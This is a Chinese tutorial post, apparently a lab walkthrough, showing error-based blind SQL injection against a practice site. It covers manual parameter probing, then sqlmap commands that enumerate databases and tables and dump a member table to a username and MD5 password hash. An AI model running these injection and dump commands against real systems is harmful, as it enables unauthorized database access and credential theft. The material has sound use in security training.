前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >SQL注入-报错盲注

SQL注入-报错盲注

原创
作者头像
酷酷的繁星
修改2020-04-07 11:28:48
6910
修改2020-04-07 11:28:48
举报
文章被收录于专栏:Web安全技术Web安全技术

我们这期的主题报错盲注,我们就得用SQLMAP进行报错盲注的漏洞利用

原文是带图的,要看有图的划到最下方有我博客链接

对站点http://219.153.49.228:41592/new_list.php?id=1进行测试

先手工判断一下这个是不是注入点

在id=1后面加‘后报错

添加and 1=1正常

添加and1=2正常

添加id=-1异常

使用SQLMAP扫描是否存在注入点

sqlmap.py -u "http://219.153.49.228:41592/new_list.php?id=1"

输入y回车

前面的sqlmap.py是文件路径,如果你的sqlmap文件名不叫sqlmap.py叫mysqlmap.py那就改成mysqlmap.py,如果你使用的是kali里面的sqlmap那就把后缀.py去掉

sqlmap.py -u "http://219.153.49.228:41592/new_list.php?id=1" --dbs 查找数据库

选择stormgroup,因为其他表都是MySQL自带的

sqlmap.py -u http://219.153.49.228:41592/new_list.php?id=1 -D stormgroup --tables扫描出表为member

sqlmap.py -u http://219.153.49.228:41592/new_list.php?id=1 -D stormgroup -T member --columns 查找出name 和password

sqlmap.py -u http://219.153.49.228:41592/new_list.php?id=1 -D stormgroup -T member -C "name,password,status" --dump 查出用户名为mozhe ,password为3c48eb99af674cdec2686f9c264211a3

md5解密,即成功的完成了一次报错盲注

转载请注明原站文章链接和作者

渗透千万条,授权第一条,谨记

原文博客链接:https://www.sakuar.cn/report-errors/

本文原创,这个博客站是我的,现在发的是跟我博客的一样

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
数据库
云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档